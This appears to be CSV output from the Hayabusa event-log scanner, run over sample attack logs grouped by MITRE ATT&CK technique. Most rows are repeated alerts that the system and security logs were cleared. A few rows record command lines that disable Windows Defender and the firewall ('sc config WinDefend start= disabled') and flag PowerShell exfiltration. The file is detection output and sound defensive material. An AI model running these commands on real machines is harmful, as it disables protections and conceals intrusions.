2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx
2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx
2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:57:04.361 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
2021-10-25 16:57:05.977 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
2021-10-25 16:57:08.463 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.480
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.028 
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.419 
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.106 
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
